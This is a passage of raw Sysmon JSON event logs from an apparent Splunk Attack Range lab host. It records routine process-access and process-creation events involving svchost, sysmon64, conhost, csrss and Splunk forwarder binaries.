C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3306,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3307,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3308,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3309,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3310,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1100-5F25-0000-0010BA620500}\r\nTargetProcessId: 792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1100-5F25-0000-0010BA620500}","TargetProcessId":"792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3311,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.263\r\nProcessGuid: {E2A3D6B1-1100-5F25-0000-001087630500}\r\nProcessId: 5092\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1100-5F25-0000-0010BA620500}\r\nParentProcessId: 792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.263","ProcessGuid":"{E2A3D6B1-1100-5F25-0000-001087630500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1100-5F25-0000-0010BA620500}","ParentProcessId":"792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list kvstore --no-log","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3312,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-1100-5F25-0000-0010BA620500}\r\nSourceProcessId: 792\r\nSourceThreadId: 860\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1100-5F25-0000-001087630500}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-1100-5F25-0000-0010BA620500}","SourceProcessId":"792","SourceThreadId":"860","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1100-5F25-0000-001087630500}","TargetProcessId":"5092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3313,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1100-5F25-0000-001087630500}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1100-5F25-0000-001087630500}","TargetProcessId":"5092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3314,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 